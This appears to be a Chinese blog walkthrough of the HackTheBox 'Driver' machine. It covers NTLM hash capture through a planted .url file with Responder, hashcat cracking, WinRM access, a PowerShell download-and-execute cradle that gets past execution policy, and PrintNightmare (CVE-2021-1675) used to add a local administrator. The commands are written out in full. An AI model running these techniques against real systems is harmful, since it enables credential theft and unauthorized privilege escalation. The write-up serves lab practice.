title: HackTheBox-Driver-PrintNightmare author: Mosaic Theory layout: true categories: 漏洞实验 tags:
-
• 打靶日记
The man with a new idea is a crank until the idea succeeds .
具有新想法的人在其想法实现之前是个怪人。
HackTheBox-Driver
Recon:
masscan在扫描Windows及其容易出现漏端口的行为,这是我无法接受的:
Nmap scan report for 10.10.11.106
Host is up (0.12s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-auth:
| HTTP/1.1 401 Unauthorizedx0D
|_ Basic realm=MFP Firmware Update Center. Please enter password for admin
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2022-05-16T14:46:55
|_ start_date: 2022-05-16T14:39:15
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
|_clock-skew: mean: 6h59m58s, deviation: 0s, median: 6h59m58s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 255.20 seconds
80端口需要提供账号口令,而我没有:
而其他端口都不被允许匿名访问。看起来突破口确实是在80,好吧,admin/admin进去了,其实就这一个能点,其他都是假按钮:
随便提交一个文件,可以读取到HTTP请求包:
POST /fw_up.php HTTP/1.1
Host: 10.10.11.106
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------32797649710965608502761959682
Content-Length: 1306
Origin: http://10.10.11.106
DNT: 1
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Referer: http://10.10.11.106/fw_up.php
Upgrade-Insecure-Requests: 1
-----------------------------32797649710965608502761959682
Content-Disposition: form-data; name="printers"
HTB DesignJet
-----------------------------32797649710965608502761959682
Content-Disposition: form-data; name="firmware"; filename="cacert.der"
Content-Type: application/x-x509-ca-cert
0¨0
会提示成功:
看起来好像是什么都能传,介于是在内网环境,可以利用强制认证:
[InternetShortcut]
URL=whatever
WorkingDirectory=whatever
IconFile=\10.10.16.7%USERNAME%.icon
IconIndex=1
创建一个.url文件,因为这种文件有个特性,登录用户在机器上看到那一刻就已经晚了:
>> sudo responder -I tun0
[sudo] mosaictheory 的密码:
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.1.0
Author: Laurent Gaffie ([email protected])
To kill this script hit CTRL-C
>> hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt --force
TONY::DRIVER:913a938f1fb463b5:ffa92e39b6201e8731a288ece8fc0fa4:0101000000000000008590db3e69d801a12e4b2e904c599d00000000020008004a0045005700370001001e00570049004e002d005500360032004a004d004f005000500053004a00550004003400570049004e002d005500360032004a004d004f005000500053004a0055002e004a004500570037002e004c004f00430041004c00030014004a004500570037002e004c004f00430041004c00050014004a004500570037002e004c004f00430041004c0007000800008590db3e69d80106000400020000000800300030000000000000000000000000200000af20d57f4b4348c88fd4acfac68f826ba8249ad294536a15de0a5899484cd0200a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e003700000000000000000000000000:liltony
SMB没有更多的东西:
>> smbmap -H 10.10.11.106 -u tony -p liltony
[+] IP: 10.10.11.106:445 Name: 10.10.11.106
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
我可以直接链接5985 的winrm:
>> evil-winrm -i 10.10.11.106 -u tony -p "liltony"
*Evil-WinRM* PS C:Userstony> cd Desktop
*Evil-WinRM* PS C:UserstonyDesktop> ls
Directory: C:UserstonyDesktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 5/16/2022 7:39 AM 34 user.txt
*Evil-WinRM* PS C:UserstonyDesktop> cat user.txt
6..........................................
没什么权限信息,而且执行不了systeminfo:
*Evil-WinRM* PS C:UserstonyDesktop> whoami /all
USER INFORMATION
----------------
User Name SID
=========== ==============================================
drivertony S-1-5-21-3114857038-1253923253-2196841645-1003
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTINRemote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTINUsers Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITYNETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITYAuthenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITYThis Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITYLocal account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
NT AUTHORITYNTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory LabelMedium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== =======
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
*Evil-WinRM* PS C:UserstonyDesktop>
但可以通过Metasploit枚举:
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.11.106 - Collecting local exploits for x64/windows...
[*] 10.10.11.106 - 32 exploit checks are being tried...
[+] 10.10.11.106 - exploit/windows/local/bypassuac_dotnet_profiler: The target appears to be vulnerable.
[+] 10.10.11.106 - exploit/windows/local/bypassuac_sdclt: The target appears to be vulnerable.
[+] 10.10.11.106 - exploit/windows/local/cve_2020_1048_printerdemon: The target appears to be vulnerable.
[+] 10.10.11.106 - exploit/windows/local/cve_2020_1337_printerdemon: The target appears to be vulnerable.
[+] 10.10.11.106 - exploit/windows/local/cve_2022_21999_spoolfool_privesc: The target appears to be vulnerable.
[+] 10.10.11.106 - exploit/windows/local/ricoh_driver_privesc: The target appears to be vulnerable. Ricoh driver directory has full permissions
[+] 10.10.11.106 - exploit/windows/local/tokenmagic: The target appears to be vulnerable.
[*] Post module execution completed
有个驱动加载的漏洞,与靶机主题吻合。
sf6 exploit(windows/local/ricoh_driver_privesc) > set session 1
session => 1
msf6 exploit(windows/local/ricoh_driver_privesc) > set LPORT 4444
LPORT => 4444
msf6 exploit(windows/local/ricoh_driver_privesc) > run
[*] Started reverse TCP handler on 10.10.16.7:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Ricoh driver directory has full permissions
[*] Adding printer gvYCW...
[*] Deleting printer gvYCW
[*] Exploit completed, but no session was created.
但是没回弹会话。
PrintNightmare
简单来讲,在windows系统中,如果要添加打印机驱动会被系统校验APD_INSTALL_WARNED_DRIVER 标志位,如果客户端尝试添加列表中的打印机驱动程序,但未设置此位,则服务器返回 ERROR_PRINTER_DRIVER_WARNED 错误代码。如果客户端尝试添加列表中的打印机驱动程序,并且设置了此位,则服务器尝试添加打印机驱动程序,而漏洞的本质便是低权限用户可以添加APD_INSTALL_WARNED_DRIVER 标志位使其让windows以驱动高权限加载用户的DLL。如需详细代码了解,请看转以下文章:
https://bbs.pediy.com/thread-271241.htm
导入漏洞脚本被拦截了:
*Evil-WinRM* PS C:UserstonyDocuments> Import-Module .CVE-2021-1675.ps1
File C:UserstonyDocumentsCVE-2021-1675.ps1 cannot be loaded because running scripts is disabled on this system. For more information, see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170.
At line:1 char:1
+ Import-Module .CVE-2021-1675.ps1
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : SecurityError: (:) [Import-Module], PSSecurityException
+ FullyQualifiedErrorId : UnauthorizedAccess,Microsoft.PowerShell.Commands.ImportModuleCommand
*Evil-WinRM* PS C:UserstonyDocuments> . .CVE-2021-1675.ps1
File C:UserstonyDocumentsCVE-2021-1675.ps1 cannot be loaded because running scripts is disabled on this system. For more information, see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170.
At line:1 char:3
+ . .CVE-2021-1675.ps1
+ ~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : SecurityError: (:) [], PSSecurityException
+ FullyQualifiedErrorId : UnauthorizedAccess
*Evil-WinRM* PS C:UserstonyDocuments>
但是可以绕过,远程加载:
*Evil-WinRM* PS C:UserstonyDocuments> Invoke-Expression (New-Object Net.WebClient).DownloadString("ht"+"tp://10.10.16.7/CVE-2021-1675.ps1")
*Evil-WinRM* PS C:UserstonyDocuments> Get-Command Invoke-Nightmare
CommandType Name Version Source
----------- ---- ------- ------
Function Invoke-Nightmare
我可以利用该脚本添加个用户,这个用户会在本地管理员组中:
*Evil-WinRM* PS C:UserstonyDocuments> Invoke-Nightmare -NewUser "mosaic" -NewPassword "adminadmin"
[+] created payload at C:UserstonyAppDataLocalTempnightmare.dll
[+] using pDriverPath = "C:WindowsSystem32DriverStoreFileRepositoryntprint.inf_amd64_f66d9eed7e835e97Amd64mxdwdrv.dll"
[+] added user mosaic as local administrator
[+] deleting payload from C:UserstonyAppDataLocalTempnightmare.dll
*Evil-WinRM* PS C:UserstonyDocuments> net user mosaic
User name mosaic
Full Name mosaic
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 5/16/2022 9:26:38 AM
Password expires Never
Password changeable 5/16/2022 9:26:38 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 5/16/2022 9:28:03 AM
Logon hours allowed All
Local Group Memberships *Administrators
Global Group memberships *None
The command completed successfully.
*Evil-WinRM* PS C:UserstonyDocuments>
以新身份进行winrm会话:
>> evil-winrm -i 10.10.11.106 -u mosaic -p adminadmin
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:UsersmosaicDocuments> whoami
drivermosaic
*Evil-WinRM* PS C:UsersmosaicDocuments> cd ../../
*Evil-WinRM* PS C:Users> cd administrator
*Evil-WinRM* PS C:Usersadministrator> cd desktop
*Evil-WinRM* PS C:Usersadministratordesktop> type root.txt
f8.........................................
原文始发于微信公众号(老鑫安全):HackTheBox-Driver
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论